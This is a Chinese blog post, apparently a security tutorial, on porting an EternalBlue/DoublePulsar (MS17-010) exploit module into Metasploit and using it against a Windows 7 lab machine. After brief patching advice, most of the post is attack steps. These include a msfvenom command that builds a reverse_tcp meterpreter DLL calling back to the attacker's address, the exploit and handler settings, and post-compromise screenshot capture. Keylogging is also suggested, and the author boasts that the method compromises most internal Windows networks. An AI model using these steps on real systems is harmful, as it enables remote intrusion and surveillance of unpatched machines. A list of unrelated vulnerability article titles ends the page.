內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用
0x01 引言
2017年4月,網路最為轟動的事件無疑是TheShadowBrokers放出一大批NSA(美國國家安全局)「方程式組織」 (Equation Group)使用的極具破壞力的黑客工具,其中包括可以遠程攻破全球約70%Windows機器的漏洞利用工具。一夜之間,全世界70%的windows伺服器置於危險之中,國內使用windows伺服器的高校、國企甚至政府機構也不能倖免。這對互聯網無疑造成了一次大地震,因為已經很久沒有出現過像MS17-010這種級別的漏洞了,因此就被大家笑語說出了「指哪打哪」這樣一個事實。
受影響的Windows 版本包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8、Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
0x02 Eternalblue(MS17-010)漏洞介紹
漏洞原理詳見:NSA Eternalblue SMB漏洞分析
0x03 MS17-010漏洞的危害及修復措施
1.升級到微軟提供支持的Windows版本,並安裝補丁:https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
2.安裝相關的防護措施,如緩衝區溢出防禦軟體、殺毒軟體。
3.無補丁的Windows版本,臨時關閉135、137、445埠和3389遠程登錄。
0x04 移植MS17-010漏洞利用代碼模塊
Metasploit集合了大量的系統漏洞利用代碼,但並不是擁有所有的漏洞代碼,所以Metasploit有一個非常強大的功能,它允許使用者開發自己的漏洞模塊,MS17-010的漏洞利用模塊Metasploit雖然還沒有集成,但是網路上已經有相應的滲透模塊了,這些模塊可能是用各種語言編寫的,比如perl、python等,Metasploit支持各種不同語言編寫的模塊移植到其框架中,通過這種機制可以將各種現存的模塊軟體移植成為與Metasploit兼容的滲透模塊。
當網路上Eternalblue漏洞烽煙四起,血流成河的時候,我在想為啥不把這個東西放到msf里去啊?現在外網伺服器大部分都打補丁了,但是內網相對比較薄弱,打補丁的管理員肯定不會太多啊。那特么不就是內網一個大殺器么。正當我在構思代碼要怎麼擼的時候,瞄到了推特上一條消息。
還說什麼,趕緊測試啊
我那個激動啊,還看想毛線啊,趕緊看看人家怎麼寫的去測試啊!
首先我們把它克隆到我們本地
我們可以在裡面修改一下一些默認的配置信息,(圖片中標註的是默認文件地址)
修改完成後,我們將他放到metasploit的目錄下供我們使用
(你想放哪裡放哪裡,這些都不重要,只要你記得住)
打開msf並重新載入全部文件
ok,載入完成後我們就可以讀取到我們新添加進去的模塊了
0x05 Metasploit下MS17-010漏洞提權實戰利用
攻擊機器kali:192.168.12.110
靶機win7 x32: 192.168.12.108
我們生成一個dll文件,是32位的系統就生成32位的dll,64位的系統就生成64位的系統,根據情況而定。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
打開msf,使用我們自己的模塊
use exploit/windows/smb/eternalblue_doublepulsar
設置相關信息
set RHOST 192.168.12.108
我們需要設置payload來監聽攻擊成功後返回的shell
use exploit/multi/handler
set lhost 192.168.12.110
set lport 4444
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
設置完成後
執行Exploit
我們成功獲取到了一個meterpreter會話
看一下對方ip
ifconfig
這個時候,我們就可以干一些壞壞的事情了,比如說看看屏幕、鍵盤記錄等等,我就截取個屏幕吧
screenshot
0x05 總結
這個漏洞剛出來的時候基本上可以通殺百分之七十的外網windows伺服器。截止到這會,根據我的內網測試結果,可以通殺百分之九十的Windows內網伺服器。
TAG:嘶吼RoarTalk |
※價值10000美元的Tesla Model 3 XSS漏洞
※Microsoft Windows CVE-2018-1040漏洞分析
※深入分析Microsoft Outlook漏洞CVE-2018-8587
※Linux中create_elf_tables函數整型溢出漏洞分析(CVE-2018-14634)
※CVE-2019-0708漏洞:RDP=Really DO Patch?
※iOS 12.1.4還包括一個Live Photos漏洞修復
※CVE-2019-11815:Linux kernel漏洞
※Microsoft Edge瀏覽器曝嚴重漏洞CVE-2018-8235,泄露敏感數據!
※CVE-2019-0797 windows 0-day 漏洞分析
※蘋果推送 iOS 12.1.4,修復 Group FaceTime 安全漏洞
※蘋果今日推送iOS12.1.4 修復了Group Face Time漏洞
※CVE-2019-0841:Windows許可權提升漏洞PoC
※Cve-2019-6340 Drupal遠程代碼執行漏洞
※關鍵漏洞CVE-2018-4013感染媒體播放器MPlayer與VLC
※研究人員公開新CPU漏洞Spectre 1.1和Spectre 1.2
※蘋果發布iOS 12.1.4更新 修復FaceTime漏洞
※CVE-2019-0859:win32k.sys 0 day漏洞
※iOS 12.1.4正式版更新 主要修復Group FaceTime的漏洞
※Fallout EK歸來,加入CVE-2018-15982漏洞利用
※從流量側淺談WebLogic遠程代碼執行漏洞(CVE-2018-3191)